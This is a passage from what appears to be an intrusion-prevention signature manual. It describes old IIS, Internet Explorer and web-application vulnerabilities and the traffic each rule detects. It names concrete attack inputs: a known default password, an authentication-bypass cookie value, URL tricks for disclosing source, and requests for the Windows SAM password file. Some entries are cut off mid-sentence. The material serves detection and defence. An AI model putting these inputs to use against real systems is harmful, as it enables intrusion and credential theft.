environment. Open-Enterprise-Server 9.0 is vulnerable to heap based buffer overflow via sending an HTTP request
with a negative Content-Length header. A successful exploitation of this vulnerability allows an attacker to execute
arbitrary commands on the vulnerable system. This vulnerability is fixed and patches are available from vendors web
site.
Signature ID: 1550
Novell GroupWise Messenger Accept-Language Remote Buffer Overflow Vulnerability
Signature Description: Novell Messenger is a corporate, cross-platform instant messaging product that is based on
Novell eDirectory. Novell GroupWise Messenger 2.0 and prior are vulnerable to a stack based buffer overflow via a
long Accept-Language value without a comma or semicolon. A successful exploitation of this vulnerability allows an
attacker to execute arbitrary commands on the vulnerable system. This vulnerability is fixed in GroupWise Messenger
2.0 Public Beta 2 version. Users are advised to update the GroupWise Messenger 2.0 Public Beta 2 or later version to
resolve this issue.
224
Signature ID: 1551
Microsoft Internet Explorer DirectAnimation.DATuple ActiveX Arbitrary Code Execution
Vulnerability(1)
Signature Description: Microsoft Internet Explorer(IE) allows instantiation of COM objects not designed for use in the
browser. Microsoft IE does not properly handle uninitialized COM objects. Microsoft COM is a technology that allows
programmers to create reusable software components that can be incorporated into applications to extend their
functionality. Microsoft Internet Explorer(Microsoft Internet Explorer versions 5.01 and 6) is a denial of service
vulnerability. This vulnerability is caused due to memory corruption in the DirectAnimation.DATuple ActiveX control
Nth() method. Successful exploits may allow attackers to crash the application, denying further service to users. This
issue may also be exploited to execute arbitrary machine-code. Users are advised to set the killbit for for the vulnerable
ActiveX control's CLSID 5DFB2651-9668-11D0-B17B-00C04FC2A0CA.
Signature ID: 1552
Microsoft Internet Explorer DirectAnimation.DATuple ActiveX Arbitrary Code Execution
Vulnerability(2)
Signature Description: Microsoft Internet Explorer(IE) allows instantiation of COM objects not designed for use in the
browser. Microsoft IE does not properly handle uninitialized COM objects. Microsoft COM is a technology that allows
programmers to create reusable software components that can be incorporated into applications to extend their
functionality. Microsoft Internet Explorer(Microsoft Internet Explorer versions 5.01 and 6) is a denial of service
vulnerability. This vulnerability is caused due to memory corruption in the DirectAnimation.DATuple ActiveX control
Nth() method. Successful exploits may allow attackers to crash the application, denying further service to users. This
issue may also be exploited to execute arbitrary machine-code.
Signature ID: 1554
Microsoft Internet Explorer VML fill method Buffer overflow Vulnerability(1)
Signature Description: Microsoft Internet Explorer is a series of graphical web browser developed by Microsoft.
Microsoft Internet Explorer (Microsoft Internet Explorer 5.01 SP4, 6 SP1) is a stack-based buffer overflow
vulnerability in "VGX.dll" in the processing of Vector Markup Language(VML) text. VML(Vector Markup Language)
is an XML(Extensible Markup Language) language used to produce vector graphics. By creating a malicious HTML
document containing specially-crafted VML document containing an overly long "fill" method inside a "rect" tag with
the Internet Explorer browser, a remote attacker could overflow a buffer and execute arbitrary code on the system with
permissions of the victim user. An attacker could exploit this vulnerability by hosting the file on a web site or sending it
to a victim as an email attachment.
Signature ID: 1555
Microsoft Internet Explorer VML Buffer overflow Vulnerability(2)
225
to a victim as an email attachment. user can set killbit to the clsid corresponding to the progid PeerDraw.PeerDraw.1 to
resolve this issue.
Signature ID: 1556
Microsoft Internet Explorer VML Buffer overflow Vulnerability(3)
to a victim as an email attachment. user can set killbit to the clsid 10072CEC-8CC1-11D1-986E-00A0C955B42E to
resolve this issue.
Signature ID: 1561
Microsoft HTML Help ActiveX control Input Validation Vulnerability(1)
Signature Description: Hypertext Markup Language(HTML) is a programming language used to create documents for
display on the World Wide Web. The markup tells the Web browser how to display a Web page's words and images for
the user. The HTML Help control (HHCtrl Object) is a Windows ActiveX control that provides the ability to view
HTML help files. The HHCtrl Object is included in the file hhctrl.ocx and provides the ProgID(Intenet.HHCtrl). By
passed malformed arguments to certain methods, a remote attacker could exploit this vulnerability and execute arbitrary
code by tricking a user into visiting a specially-crafted web page. Affected versions are Microsoft Windows 2000 SP3,
XP SP2 and Professional, Microsoft Windows 2003 SP1.
Signature ID: 1562
Microsoft HTML Help ActiveX control Input Validation Vulnerability-2
Signature Description: Hypertext Markup Language(HTML) is a programming language used to create documents for
display on the World Wide Web. The markup tells the Web browser how to display a Web page's words and images for
the user. The HTML Help control (HHCtrl Object) is a Windows ActiveX control that provides the ability to view
HTML help files. By passing malformed arguments to certain methods, a remote attacker could exploit this
vulnerability and execute arbitrary code. Affected versions are Microsoft Windows 2000 SP3, XP SP2 and
Professional, Microsoft Windows 2003 SP1. User can set kill bit to the clsid 52a2aaae-085d-4187-97ea-8c30db990436
Signature ID: 1696
Microsoft IIS Failure To Log Undocumented TRACK Requests Vulnerability
Bugtraq: 9313
Signature Description: Microsoft Internet Information Services (IIS) is a set of Internet-based services for servers using
Microsoft Windows. Microsoft Internet Information Server(Microsoft IIS 4.0 and 5.0) fails to properly log HTTP
226
TRACK. The HTTP TRACK method asks a web server to echo the contents of the request back to client for debugging
purpose. By sending a specially-crafted HTTP TRACK request, a remote attacker may abuse HTTP TRACK
functionality to gain access to information in HTTP headers such as cookies and authentication data. Upgrade the latest
version at vendor's website.
Signature ID: 1698
Microsoft IIS ISAPI Printer Extension Buffer Overflow Vulnerability
Microsoft Windows. Microsoft Internet Information Server(Microsoft IIS version 5.0) is a buffer overflow
vulnerability in the handling of ISAPI(Internet Services Application Programming Interface) extensions. ISAPI
(internet Server Application Program Interface) is a set of Windows program class that enables programmers to
develop Web-based applications that will run much faster than common gateway interface(CGI) application. An
Unchecked buffer exists in the Internet printing protocol(IPP) ISAPI extension in windows 2000 that handles user
requests(msw3prt.dll). IPP(Internet Printing Protocol) an Internet protocol that allows universal solutions to users
trying to print documents from the Internet. This signature detects if an attacker try to exploit host header field with
more then 300 bytes of data on http traffic. This issue is fixed and patches are available from vendors website.
Signature ID: 1699
Microsoft IIS ISAPI Printer Extension Buffer Overflow Vulnerability
Microsoft Windows. Microsoft Internet Information Server(Microsoft IIS version 5.0) is a buffer overflow
vulnerability in the handling of ISAPI(Internet Services Application Programming Interface) extensions. ISAPI
(internet Server Application Program Interface) is a set of Windows program class that enables programmers to
develop Web-based applications that will run much faster than common gateway interface(CGI) application. An
Unchecked buffer exists in the Internet printing protocol(IPP) ISAPI extension in windows 2000 that handles user
requests(msw3prt.dll). IPP(Internet Printing Protocol) an Internet protocol that allows universal solutions to users
trying to print documents from the Internet. This signature detects if printer request containing more then 300 bytes
with null uri data. This issue is fixed and patches are available from vendors web site.
Signature ID: 1700
Microsoft IIS 3.0 '%2e' ASP Source Disclosure Vulnerability
Microsoft Windows. Microsoft IIS(Microsoft IIS versions 1.0,2.0,3.0) will return the source code of various server side
script files such as ASP files(An Active Server Page(ASP) is an HTML page that includes one or more scripts(small
embedded programs) that are processed on a Microsoft Web server before the page is sent to the user) if the filename in
the URL request contains a "%2e"(the hex value for %2e is .), a remote attacker could possibly yield sensitive
information such as user names and passwords. Upgrade the latest version at the vendor's website.
Signature ID: 1701
Microsoft IIS 4.0 Buffer Overflow While Processing .HTR, .STM and .IDC Files Vulnerability
Signature Description: Microsoft Internet Information Server (IIS) is a web server that ships with Windows platform.
Microsoft IIS version 4.0 is vulnerable to a denial of service attack caused by a buffer overflow involving the way that
227
.HTR, .STM, and .IDC files are processed. IIS version 4.0 can perform various server-side processing with specific file
types. When a web site visitor requests a file of one of these types, an appropriate filter DLL processes it. By sending a
malformed request, an attacker can overflow a buffer and cause the service to crash or execute arbitrary code. Install
the update issued in Microsoft Security Bulletin MS99-019.
Signature ID: 1702
Microsoft IIS 4.0/5.0 Source Fragment Disclosure Vulnerability
Industry ID: CVE-2000-0630 CVE-2000-0457 Bugtraq: 1488,1193,189
Signature Description: Microsoft Internet Information Services (IIS) 4.0 and 5.0 are vulnerable to a Source code
disclosure vulnerability. If '+.htr' is appended to a request for a known .asp (or .asa or .ini etc.,), the request will be
handled by ISM.DLL, which then strips the +.htr string and may disclose part or all of the source of the .asp file
specified in the request.
Signature ID: 1703
Microsoft IIS HTTP Header Field Delimiter Buffer Overflow Vulnerability
Signature Description: Microsoft Internet Information Server (IIS) is vulnerable to a buffer overflow in the handling of
HTTP headers, an intruder could execute arbitrary code with privileges that vary according to which version of IIS is
running. IIS version 4.0 permits an intruder to execute code with complete administrative privileges, while IIS 5.0 and
5.1 permit an intruder to execute code with the privileges of the IWAM_computername account.
Signature ID: 1705
Microsoft IIS executable file parsing vulnerability
Signature Description: Microsoft Internet Information Services (IIS) can receive executable file requests and valid
requests are sent for Operating System for processing. A vulnerability exists in IIS 4.0 and 5.0 in a way when IIS
receives a specially formed request for an executable file followed by operating system commands, IIS will proceed to
process the entire string rather than rejecting it. An attacker can use this vulnerability to modify Web pages or other
files on the Web server, reformat the hard drive, or perform other unauthorized actions. In order to establish successful
exploitation, the file requested must be an existing .bat or .cmd file residing in a folder that the user possesses
executable permissions.
Signature ID: 1710
Microsoft IIS HTR Chunked Encoding Transfer Heap Overflow Vulnerability
Signature Description: This rule gets hit when an attempt is made to exploit a buffer overflow associated with chunked
encoding data transfer mechanism which is part of the ISAPI (Internet Services Application Programming Interface)
extension that implements HTR functionality in Microsoft Internet Information Services (IIS). Chunked encoding is a
means to transfer variable-sized units of data (called chunks) from a web client to a web server. By sending a speciallycrafted "chunk" of data that causes the incorrect buffer size to be allocated, a remote attacker could overflow a buffer
and execute arbitrary code on the system or cause the IIS service to fail. Microsoft IIS 4.0 and 5.0 are vulnerable to this
issue.
228
Signature ID: 1711
WEB-IIS /StoreCSVS/InstantOrder.asmx request Vulnerability
Transfer Protocol service and a File Transfer Protocol service. It was developed by Microsoft. InstantOrder.asmx
provides automated ordering services. This services exposes a programmatic interface that enables users to transfer new
orders from their web sites or Web-connected programs directly to the Commerce site. This rule will trigger when an
attacker attempt to access InstantOrder.asmx. The successful exploitation of this issue will allow an attacker to gain
information.
Signature ID: 1712
Microsoft IIS 4.0 samples directory access Vulnerability
Signature Description: Microsoft IIS(Internet Information Server) is a group of Internet servers including a Web or
Hypertext Transfer Protocol server and a File Transfer Protocol server. It was developed by Microsoft. This rule gets
hit when an attempt is made to access /msadc/samples directory under Microsoft IIS. IIS 4.0 with default installation
contains some vulnerable scripts in samples directory which may show source code of IIS files. An attacker may use
this information in constructing further attacks.
Signature ID: 1713
EarlyImpact ProductCart SQL Injection Vulnerability
Industry ID: CVE-2004-2173 CVE-2004-2174 Bugtraq: 8103,9669,9669 Nessus: 11785
Signature Description: EarlyImpact ProductCart is a shopping cart software to sell products and services online. This
rule gets hit when an attempt is made to access EarlyImpact ProductCart search scripts or login script. An SQL
Injection vulnerability exists in the search files advSearch_H.asp, advSearch_I.asp, advSearch_L.asp,
advSearch_M.asp, advSearch_P.asp and the customer login page custva.asp. All versions prior to 2.0 are affected.
Signature ID: 1715
Microsoft IIS 1.0 Directory traversal attempt Vulnerability
Signature Description: Microsoft Internet Information Server (IIS) is a web server that ships with Windows platform.
This rule gets hit when an attempt is made to access Microsoft Internet Information Service (IIS) 1.0 hosts by a
malformed request. IIS 1.0 servers are vulnerable to a denial of service attack when a malformed request containing
"..\.." is sent to the server. The service must be restarted to restore functionality.
Signature ID: 1716
Persits ASPUpload 2.1 DirectoryListing.asp access Vulnerability
Signature Description: This rule gets hit when an attempt is made to access DirectoryListing.asp via HTTP. Persits
ASPUpload is an Active Server component that allows users to upload files to ASP programs using a Web browser.
The sample script 'DirectoryListing.asp' which is installed by default allows a remote user to browse directories, and
download any file located on the server. Persits ASPUpload 2.1 is vulnerable.
229
Signature ID: 1719
Microsoft Data Access Components RDS Buffer Overflow Vulnerability
Signature Description: Microsoft Data Access Components (MDAC) is a collection of utilities and routines to process
requests between databases and network applications. A buffer overflow vulnerability exists in the Remote Data
Services (RDS) component of MDAC 2.1 through 2.6. The RDS component provides an intermediary step for a client's
request for service from a back-end database which enables the web site to apply business logic to the request. A
routine in the RDS component, specifically the RDS Data Stub function, contains an unchecked buffer. The RDS Data
Stub function's purpose is to parse incoming HTTP requests and generate RDS commands. This unchecked buffer
could be exploited to cause a heap overflow.
Signature ID: 1720
Microsoft Site Server 3.0 Default account login Vulnerability
Signature Description: Microsoft Site Server 3.0 for Windows NT servers allows users to publish, find, and share
information. By default, Microsoft Site Server version 3.0 prior to SP4 running on Windows NT 4.0 creates a user
account with a known password. The "LDAP_Anonymous" user account allows limited local login privileges and uses
the known password "LdapPassword_1". When an attacker logs on with the default user name and password, Site
Server reveals information about some Site Server files.
Signature ID: 1721
Microsoft WebProxy Service w3proxy.dll file access vulnerability
Signature Description: Web Proxy Server is a server which services the requests of its clients by forwarding requests to
other servers. Microsoft Proxy Server 2.0 is vulnerable. This rule tries to detect access to w3proxy.dll via HTTP
request. The w3proxy.dll file is part of ISAPI filter of Web Proxy service. This is a vulnerable file and is associated
with a vulnerability (MS03-012). Attacker tries to scan the system to determine whether the attacked machine is
vulnerable by accessing w3proxy.dll file.
Signature ID: 1722
Microsoft Windows ASN.1 Library Bit String Processing Vulnerability
Industry ID: CVE-2003-0818 Bugtraq: 9635 Nessus: 12065,12052,12054,12055
Signature Description: Abstract Syntax Notation number One (ASN.1) is an international standard used to describe and
transmit data packets between applications and across networks. There is a buffer overflow vulnerability in the
Microsoft ASN.1 Library that could allow an unauthenticated, remote attacker to execute arbitrary code with SYSTEM
privileges on the affected system (MS04-0007). This rule tries to detect scan attempt for this vulnerability. Affected
Systems are Microsoft Windows NT 4.0, Microsoft Windows NT 4.0 TSE, Microsoft Windows 2000, Microsoft
Windows XP, Microsoft Windows Server 2003. 
Signature ID: 1723
NewsPro administration unauthorized authentication vulnerability
Signature Description: NewsPro is a freely available ASP script used to display and maintain news stories for Web
230
sites. There exists a vulnerability in NewsPro 1.01 that allows a remote attacker to gain unauthorized access to the
application. This vulnerability allows the attacker to set their authentication cookie to "logged,true" to gain
unauthorized administrator access to NewsPro. No remedy available as 2008.
Signature ID: 1724
Microsoft Windows SAM file access vulnerability
Signature Description: This rule gets hit when an attempt is made to access the Windows Security Accounts Manager
(SAM) password file via a web request. The SAM password file contains Windows logins which are NTLM or
LANMAN hashes on Windows NT/2K/XP hosts. If an attacker can get the real SAM file and is able to gain clear text
passwords, the host can be compromised using the Administrator's login.
Signature ID: 1725
Microsoft SQL Server SQLXML contenttype Buffer Overflow Vulnerability
Signature Description: SQLXML is a component of SQL Server 2000, which enables SQL servers to receive and send
database queries via XML (Extensible Markup Language) format. IIS enables XML over HTTP using SQLXML HTTP
components, one of which is an ISAPI extension. The SQLXML ISAPI extension does not adequately validate the
length of the content-type parameter. As a result, an attacker could construct a URI with a specially crafted value for
content-type that triggers a buffer overflow on a vulnerable IIS server. An IIS server is only vulnerable if SQLXML is
enabled and configured to run over HTTP. Affected Platforms are Microsoft SQL Server 2000, Microsoft SQL Server
2000 Gold, Microsoft SQLXML 2, Microsoft SQLXML 3, Microsoft Windows 2003 Server, Microsoft Windows
XP Professional.
Signature ID: 1726
SmarterTools SmarterMail frmCompose.aspx file access Vulnerability
Signature Description: SmarterTools SmartMail is a mail server application for Microsoft Windows. SmartMail 1.61 is
vulnerable to a cross-site scripting attack which exists in the page frmCompose.aspx. This vulnerability is due to
insufficient sanitization of user supplied data when using the spell check function. A successful exploitation of this
vulnerability allow an attacker to steal cookie-based authentication credentials on vulnerable system. This vulnerability
is fixed in SmartMail 1.62 version. Administrators are advised to update the SmartMail 1.62 version or later version to
resolve this issue.
Signature ID: 1727
SmarterTools SmarterMail frmGetAttachment.aspx Information Disclosure vulnerability
Signature Description: SmarterTools SmartMail is a mail server application for Microsoft Windows. It is possible for a
malicious user to read any file on the system by using the file frmGetAttachment.aspx. SmarterMail 1.6.1511 and
1.6.1529 are vulnerable to a directory traversal. This vulnerability is due to insufficient sanitization of user supplied
data. A successful exploitation of this vulnerability allow an attacker to execute arbitrary commands on vulnerable
system.
231
Signature ID: 1728
SmarterTools SmarterMail login.aspx Buffer Overflow Vulnerability
Signature Description: SmarterTools SmartMail is a mail server application for Microsoft Windows. SmarterMail
1.6.1511 and 1.6.1529 uses the file "login.aspx" to authenticate a valid user. The file 'login.aspx' uses post method and
takes txtusername parameter which is prone to buffer overflow. By sending a large string of more than 980 characters
buffer overflow can be produced. An attacker can execute arbitrary code by exploiting this vulnerability.
Signature ID: 1729
HTTP Error 403 - Forbidden response from Webserver vulnerability
Signature Description: HTTP(HyperText Transfer Protocol) is a protocol used by the World Wide Web. It is used for
transferring files(text, graphic, images, sound, video, and other multimedia files) on the World Wide Web. This
rule will trigger when the user access the site, if any issues are occurred inside the network then 403 Forbidden error
message is detected. This may occur, when the URL ending with '/' then "403 Forbidden" error message is returned.
Signature ID: 1730
WEB-IIS UploadScript11.asp access Vulnerability
Signature Description: AspUpload is an ASP extension which allows remote users to upload files through html form.
AspUpload(AspUpload version 2.1) will receive the uploaded streams and save them in the server as files. It create
sample scripts(such as UploadScript11.asp) during installation. A remote attacker can exploit this vulnerability to
upload and read arbitrary files, and list arbitrary directories, via a ..(dot dot) in the filename parameter in
UploadScript11.asp or DirectoryListing.asp. No remedy available as of July 2008.
Signature ID: 1731
Virtual Programing VP-ASP shopdisplayproducts.asp SQL injection vulnerability
Signature Description: Virtual Programming VP-ASP is a shopping cart application that is written in ASP and supports
MS-ACCESS, MySQL and MSSQL Databases. The script shopdisplayproducts.asp in VP-ASP is vulnerable to a SQL
injection attack that allow an attacker to gain administrative access to the installed VP-ASP Shopping Cart software or
execute arbitrary commands on a target's system. Affected Platform is Rocksalt International VP-ASP 5.00
Signature ID: 1732
Virtual Programing VP-ASP shopsearch.asp SQL injection vulnerability
Signature Description: Virtual Programming VP-ASP is a shopping cart application that is written in ASP and supports
MS-ACCESS, MySQL and MSSQL Databases. The script shopsearch.asp in VP-ASP is vulnerable to a SQL injection
attack that allow an attacker to gain administrative access to the installed VP-ASP Shopping Cart software or execute
arbitrary commands on a target's system. Vulnerable platforms are VP-ASP 4.0 and 5.0.
232
Signature ID: 1733
Microsoft Windows ntdll.dll Buffer Overflow with IIS WebDAV request vulnerability
Signature Description: Microsoft Windows contains ntdll.dll which is a core operating system component used to
interact with the Windows kernel. A buffer overflow vulnerability exists in ntdll.dll and this can be exploited by using
WebDAV component of Microsoft IIS. The IIS WebDAV component utilizes ntdll.dll when processing incoming
WebDAV requests. By sending a specially crafted WebDAV request to an IIS 5.0 server, an attacker may be able to
execute arbitrary code in the Local System security context, essentially giving the attacker complete control of the
system. Many other applications that can make use of ntdll.dll can also exploit this vulnerability. This rule looks for
exploitation of this vulnerability by a specially crafted WebDAV request to IIS server.
Signature ID: 1734
Microsoft Windows ntdll.dll Buffer Overflow with IIS WebDAV request vulnerability
Signature Description: Microsoft Windows contains ntdll.dll which is a core operating system component used to
interact with the Windows kernel. A buffer overflow vulnerability exists in ntdll.dll and this can be exploited by using
WebDAV component of Microsoft IIS. The IIS WebDAV component utilizes ntdll.dll when processing incoming
WebDAV requests. By sending a specially crafted WebDAV request to an IIS 5.0 server, an attacker may be able to
execute arbitrary code in the Local System security context, essentially giving the attacker complete control of the
system. Many other applications that can make use of ntdll.dll can also exploit this vulnerability. This rule looks for
exploitation of this vulnerability by a specially crafted WebDAV request to IIS server. This signature triggers when an
attacker request 'search' and 'Host' with the long string (more than 255).
Signature ID: 1735
Microsoft IIS Extensions WebDAV LOCK method Denial of Service Vulnerability
Signature Description: WebDAV extensions are used by administrators to manage and edit Web content remotely in
Microsoft Internet Information Services. The WebDav extensions (httpext.dll) for Internet Information Server 5.0
contain a flaw that could allow a malicious user to consume all available memory on the server. The server will run out
of memory and crashes if requests for non-existing files are sent by LOCK method. Apply the appropriate patch, as
listed in Microsoft security bulletinsMS01-014 and MS01-016.
Signature ID: 1736
Microsoft Site Server _mem_bin directory access Vulnerability
Nessus: 11032
Signature Description: Microsoft Site Server 3.0 for Windows NT servers allows users to publish, find, and share
information.This rule generates an event when an attacker tries to access _mem_bin directory of Site Server 3.0. The
Site Server installation places a few ASPs and DLLs in the _mem_bin directory in the \wwwroot\. Some ASP pages in
this directory reveal default LDAP schema including host and port.
Signature ID: 1738
Microsoft IIS 4.0 IISADMPWD Proxied Password Vulnerability
Signature Description: This rule gets hit when an attempt is made to request an HTTP-based password change via
233
anot*.htr file. Microsoft Internet Information Services (IIS) Version 4 supplies a feature to allow users to make remote
password changes. The iisadmpwd directory has several .HTR files (achg.htr, aexp*.htr, and anot*.htr)that are used to
implement the password changes. An attacker can request a change and use a returned form to supply an account name,
existing password, and new password either to brute force changes or discover whether a specific account name exist.
Signature ID: 1739
AskSam Web Publisher as_web.exe Cross Site Scripting Vulnerability
Signature Description: AskSam Web Publisher is a tool for publishing documents and databases to the Web. askSam
Web Publisher (as_web.exe) versions 1 and 4 are vulnerable to cross-site scripting. A remote attacker could attach
malicious JavaScript as a user-supplied variable in a URL request to as_web.exe or as_web4.exe, which would be
executed in the victim's Web browser once the link is clicked. This hits when the as_web.exe followed with script tag.
Signature ID: 1740
AskSam Web Publisher as_web4.exe Cross Site Scripting Vulnerability
Signature Description: AskSam Web Publisher is a tool for publishing documents and databases to the Web. askSam
Web Publisher (as_web.exe) versions 1 and 4 are vulnerable to cross-site scripting. A remote attacker could attach
malicious JavaScript as a user-supplied variable in a URL request to as_web.exe or as_web4.exe, which would be
executed in the victim's Web browser once the link is clicked. This rule hits when "as_web4.exe" followed with script
tag in the uricontent.
Signature ID: 1741
Microsoft IIS Appended Dot Script Source Disclosure Vulnerability
Hypertext Transfer Protocol server and a File Transfer Protocol server. It was developed by Microsoft. Microsoft IIS
2.0 and 3.0 suffer from an issue allowing a remote user to retrieve the source code for any script (that has read
permissions on the server) via a web browser. This is accomplished by appending a period (.) to the end of a URL
requesting a specific script, and applies to any file types in the "script-map list", including .asp, .ht., .id, .PL, and others.
Consequences of exploitation vary depending on the site design, but commonly include details of directory structure on
the web server, database passwords, and various other pieces of information that could then be used to mount further
attacks. Upgrade to the latest version of IIS(4.0 or later), available at vendor's website.
Signature ID: 1742
WEB-IIS asp-srch Vulnerability
Transfer Protocol service and a File Transfer Protocol service. It was developed by Microsoft. This rule will tries to
detect when the .asp is found in content while accessing a web server run by IIS. The successful exploitation of this
issue will allow an attacker to gain information on the IIS implementation on the host.
Signature ID: 1743
Access to cmd32.exe Vulnerability
Signature Description: This rule gets hit when an attempt is made to access the cmd32.exe file. This file is only
234
accessible if maliciously placed in the web server's root directory or an attacker performs unauthorized directory
traversal. This may permit the attacker to execute arbitrary commands on the vulnerable server.
Signature ID: 1744
Microsoft IIS .cmd?& Access Vulnerability
Transfer Protocol service and a File Transfer Protocol service. It was developed by Microsoft. This rule gets hit when
.cmd?& is found in content while accessing a web server run by IIS. The successful exploitation of this issue will allow
an attacker to gain information on the IIS implementation of the host which may be the prelude to an attack against that
host using that information.
Signature ID: 1746
Microsoft IIS Form_VBScript.asp XSS Vulnerability
Signature Description: Microsoft IIS contains a flaw that allows a remote cross site scripting attack. This flaw exists
because the application does not validate input upon submission to the "Form_VBScript.asp" script. This could allow a
user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to loss of integrity. Vulnerable Platforms are Microsoft IIS 4.0 and 5.0.
Signature ID: 1747
WEB-Microsoft IIS FTP del attempt Vulnerability
Transfer Protocol service and a File Transfer Protocol service. It was developed by Microsoft. IIS allows users to delete
files on the server by using the del command. Microsoft IIS 4.0 and Microsoft Commercial Internet System 2.5 are
vulnerable. This rule generates an event when an attacker sent del command to the http server. 
Signature ID: 1748
Microsoft Front Page file doctodep.btr access Vulnerability
Signature Description: Microsoft FrontPage is a HTML editor and web site administration tool from Microsoft for
Windows. Front Page Server Extensions allows Microsoft FrontPage clients to communicate with web servers, and
provide additional functionality intended for websites. This rule will triggers when an attacker attempt to access
Microsoft Front Page file doctodep.btr. Doctodep.btr is a dependency database for the web and can sometimes contain
fragments of server side code.
Signature ID: 1749
Microsoft IIS Escape Character Parsing Vulnerability
Signature Description: Microsoft Internet Information Server (IIS) contains a potentially exploitable vulnerability that
could allow attackers to bypass the security of third-party applications running atop IIS. Special and unprintable
characters are represented in URLs as hexadecimal escapes preceded by the '%' character. Some invalid hexadecimal
characters (characters other than 0-9 or a-f) could be interpreted as valid ASCII characters and could be used to subvert
access controls in some applications. Vulnerable Platforms are Microsoft Site Server Commerce Edition 3.0, Microsoft
IIS 4.0
235
Signature ID: 1750
WEB-IIS exec-src access Vulnerability
Transfer Protocol service and a File Transfer Protocol service. It was developed by Microsoft. This rule will tries to
detect when the .exe is found in content while accessing a web server run by IIS. The successful exploitation of this
issue will allow an attacker to gain information on the IIS implementation on the host.
Signature ID: 1751
FoxWeb PATH_INFO Remote Buffer Overrun Vulnerability
Signature Description: FoxWeb is a tool used to create interactive Web applications for Microsoft Windows operating
systems. FoxWeb version 2.5 is vulnerable to a stack-based buffer overflow in the foxweb.dll scripts. By supplying an
overly long URL string to the PATH_INFO variable (over 3000 bytes) in the foxweb.dll script, a remote attacker could
overflow a buffer and execute arbitrary code on the system. No remedy available as of August 2008.
Signature ID: 1752
FoxWeb PATH_INFO Remote Buffer Overrun Vulnerability
Signature Description: FoxWeb is a tool used to create interactive Web applications for Microsoft Windows operating
systems. FoxWeb version 2.5 is vulnerable to a stack-based buffer overflow in the foxweb.exe script. By supplying an
overly long string to the PATH_INFO variable (over 3000 bytes) in the the foxweb.exe script, a remote attacker could
overflow a buffer and execute arbitrary code on the system. No remedy available as of August 2008.
Signature ID: 1753
WEB-IIS getdrvs.exe access Vulnerability
Transfer Protocol service and a File Transfer Protocol service. It was developed by Microsoft. This rule will triggers
when an attacker attempt to access getdrvs.exe file. The successful exploitation of this issue will allow a remote
attacker to disclose sensitive information.
Signature ID: 1754
Nimda Worm httpodbc.dll (cool.dll) file access Vulnerability
Signature Description: Nimda worm uses the Unicode Web Traversal exploit to infect unpatched Microsoft IIS (4.0
and 5.0)web servers. On these web servers, it is possible to construct a URL that would cause the IIS to navigate to any
desired folder on the logical drive that contains the Web folder structure, and then access files in it. Successful
exploitation of the Directory Traversal Vulnerability gives the attacker the ability to install and run code, as well as
add, change, or delete files or Web pages on the compromised server. Apply the appropriate patch, as listed in
Microsoft Security Bulletin MS01-041, MS01-044, MS02-001, or MS02-018.
236
Signature ID: 1755
Microsoft IIS 4.0 Buffer Overflow while processing .HTR, .STM and .IDC files Vulnerability
Signature Description: Microsoft Internet Information Server (IIS) version 4.0 is vulnerable to a denial of service
attack caused by a buffer overflow involving the way that .HTR, .STM, and .IDC files are processed. IIS version 4.0
can perform various server-side processing with specific file types. Requests for files ending with .HTR, .STM, or .IDC
extensions are passed to the appropriate external DLL for processing. By sending a malformed request, an attacker can
overflow a buffer and cause the service to crash. It may be possible for an attacker to use this vulnerability to execute
arbitrary code on the system.
Signature ID: 1756
WEB-IIS iissamples access Vulnerability
Nessus: 11032
Signature Description: This event indicates that an attempt has been made to exploit potential weaknesses in a host
running Microsoft IIS. The attacker may be trying to gain information on the IIS implementation on the host, this may
be the prelude to an attack against that host using that information. The attacker may also be trying to gain
administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
This rule will triggers when an attempt is made to send an iissamples pattern.
Signature ID: 1759
WEB-IIS JET VBA access Vulnerability
Signature Description: Microsoft JET database engine is a database management system that retrieves data from and
stores data in user and system databases. The Microsoft Jet database engine can be thought of as a data manager upon
which database systems, such as Microsoft Access, are built. Microsoft JET database engine has sophisticated query
and optimization capabilities that are unmatched by other desktop database engines in its class. Microsoft
JET3.51,Microsoft JET 3.5 and Microsoft IIS 4.0 are vulnerable to gain access. A successful exploitation of this
vulnerability allow an attacker to gain information on vulnerable system. This vulnerability is fixed in Microsoft JET
4.0 version. Administrators are advised to upgrade the Microsoft JET 4.0 version or later version to resolve this
vulnerability.
Signature ID: 1760
CGI script mkilog.exe access Vulnerability
Nessus: 10359
Signature Description: This rule gets hit when an attempt is made to access the file mkilog.exe. mkilog.exe is a
Common Gateway Interface (CGI) script that can be used to view and modify SQL database contents. It posts data to
another module, ctss.idc, that creates a table based on the parameters passed to it. If an attacker passes parameters such
as a valid username and password to create a table, it may be possible to alter the table to execute commands on the
vulnerable server.
Signature ID: 1761
Microsoft IIS unauthorized ODBC data access with RDS Vulnerability
Signature Description: MDAC (Microsoft Data Access Components) is a package used to integrate web and database
237
services. It includes a component named RDS (Remote Data Services) which allows remote access via the internet to
database objects through IIS. Microsoft Data Access Components (MDAC) versions 2.1 and earlier, in the default
configuration, could allow a remote attacker to access OLE database sources. Remote Data Services (RDS), one of the
components of MDAC, is designed to permit remote data access to authenticated users through Microsoft Internet
Information Server (IIS). A vulnerability in the DataFactory object of RDS could allow an attacker to use a Web client
to send a SQL query to OLE database data sources.
Signature ID: 1763
Microsoft IIS Outlook Web Access Denial of Service Vulnerability
Signature Description: Outlook Web Access is an optional component of Microsoft Exchange Server which runs in
conjunction with Microsoft Internet Information Server. It provides access to a user's Exchange mailbox through a web
interface. A vulnerability exists in OWA in Exchange Server 5.5 to 5.5 SP4. A user can enter a long string of %
characters into the Log On field in the Outlook Web Access page. Then, when the user receives the NT challenge
dialog, a username and password composed of a long string of % characters is also entered. This will cause the WWW
Publishing service and the IIS Administration service to stop. (Ref: MS01-049)
Signature ID: 1764
Microsoft Internet Information Services (IIS) access to /scripts/perl vulnerability
when an attempt is made to access /scripts/perl directory on a web server. This may indicate that an attacker is
attempting to run code of their choosing on that server. A successful exploitation of this issue will allow an attacker to
execute arbitrary commands.
Signature ID: 1765
CGI Lite Perl Module Metacharacter Input Validation Vulnerability
Signature Description: CGI::Lite is a Perl module used for processing and decoding Web form and query information.
The escape_dangerous_chars() function in version 2.0 of the CGI::Lite module fails to filter out certain special
characters from form input. A remote attacker could exploit this vulnerability to read or write to local files, and
possibly execute shell commands on the Web server by supplying malicious form input to an affected Web server.
Signature ID: 1767
WEB-IIS postinfo.asp access Vulnerability
Signature Description: Microsoft Site Server is an intranet server designed for an NT Server with IIS. Site Server
enables users to locate and view information stored in various locations through personalized web pages and
